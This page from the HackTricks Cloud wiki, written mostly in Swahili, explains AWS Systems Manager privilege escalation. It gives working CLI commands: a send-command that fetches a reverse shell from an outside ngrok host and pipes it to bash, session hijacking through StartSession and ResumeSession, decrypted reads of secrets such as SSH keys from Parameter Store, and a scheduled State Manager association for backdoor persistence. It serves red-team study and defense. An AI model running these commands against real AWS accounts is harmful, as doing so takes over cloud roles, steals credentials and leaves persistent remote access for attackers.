HackTricks CloudAWS - SSM Privesc
Reading time: 6 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
SSM
Kwa taarifa zaidi kuhusu SSM angalia:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
ssm:SendCommand
Mshambuliaji mwenye ruhusa ssm:SendCommand anaweza kutekeleza amri kwenye instances zinazokimbia Amazon SSM Agent na kudhoofisha IAM Role inayokimbia ndani yake.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
Iwapo unatumia mbinu hii kuinua ruhusa ndani ya EC2 instance ambayo tayari imevamiwa, unaweza kukamata rev shell mahali hapa kwa kutumia:
# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
Athari Inayowezekana: Privesc ya moja kwa moja kwa EC2 IAM roles zilizoambatishwa kwa instances zinazoendesha SSM Agents.
ssm:StartSession
Mshambulizi mwenye ruhusa ssm:StartSession anaweza kuanzisha kikao kinachofanana na SSH katika instances zinazoendesha Amazon SSM Agent na kupata udhibiti wa IAM Role inayokimbia ndani yake.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"
caution
Ili kuanza kikao unahitaji SessionManagerPlugin imewekwa: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
Athari Inayowezekana: Privesc ya moja kwa moja kwa EC2 IAM roles zilizounganishwa na instances zinazoendesha na SSM Agents.
Privesc kwa ECS
When ECS tasks run with ExecuteCommand enabled users with enough permissions can use ecs execute-command to execute a command inside the container.
Kulingana na the documentation hii inafanywa kwa kuunda chaneli salama kati ya kifaa unachotumia kuanzisha amri ya “exec” na container lengwa kwa kutumia SSM Session Manager. (SSM Session Manager Plugin inahitajika ili hii ifanye kazi)
Kwa hivyo, watumiaji walio na ssm:StartSession wataweza kupata shell ndani ya ECS tasks ikiwa chaguo hilo limewezeshwa kwa kukimbia tu:
aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
.png)
Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa ECSIAM roles zilizoambatishwa kwenye running tasks zilizo na ExecuteCommand imewezeshwa.
ssm:ResumeSession
Mshambuliaji aliye na ruhusa ssm:ResumeSession anaweza re-start a SSH like session in instances zinazokimbia Amazon SSM Agent zikiwa na hali ya kikao cha SSM disconnected na compromise the IAM Role inayokimbia ndani yake.
# Check for configured instances
aws ssm describe-sessions
# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5
Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa EC2 IAM roles zilizoambatanishwa na instances zinazoendesha zenye SSM Agents na sessions zilizokatika.
ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)
An attacker mwenye ruhusa zilizotajwa ataweza kuorodhesha SSM parameters na kusoma kwa clear-text. Kwenye parameters hizi mara nyingi unaweza kupata taarifa nyeti kama SSH keys au API keys.
aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption
Potential Impact: Pata taarifa nyeti ndani ya vigezo.
ssm:ListCommands
Mshambulizi mwenye ruhusa hii anaweza kuorodhesha amri zote zilizotumwa na, kwa matumaini, kupata taarifa nyeti ndani yao.
aws ssm list-commands
Athari Inayoweza Kutokea: Kupata taarifa nyeti ndani ya command lines.
ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)
Mshambuliaji mwenye ruhusa hizi anaweza kuorodhesha zote commands zilizotumwa na kusoma output iliyotolewa, akiwa na matumaini ya kupata taarifa nyeti ndani yake.
# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations
aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
Athari Inayoweza Kutokea: Pata taarifa nyeti ndani ya matokeo ya mistari ya amri.
Kutumia ssm:CreateAssociation
Mshambuliaji mwenye ruhusa ssm:CreateAssociation anaweza kuunda State Manager Association ili kutekeleza amri kiotomatiki kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa zifanye kazi kwa vipindi vilivyowekwa, zikifanya ziwe zenyefaa kwa backdoor-like persistence bila interactive sessions.
aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name
note
Njia hii ya persistence hufanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inafanya kazi, na mshambuliaji ana ruhusa ya create associations. Haitegemei interactive sessions wala ruhusa wazi za ssm:SendCommand. Muhimu: Parameter ya --schedule-expression (kwa mfano, rate(30 minutes)) lazima iheshimu muda wa chini wa AWS wa dakika 30. Kwa utekelezaji wa haraka au mara moja, usitumie kabisa --schedule-expression — association itatekelezwa mara moja baada ya uundaji.
Codebuild
Unaweza pia kutumia SSM kuingia ndani ya mradi wa codebuild unaojengwa:
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.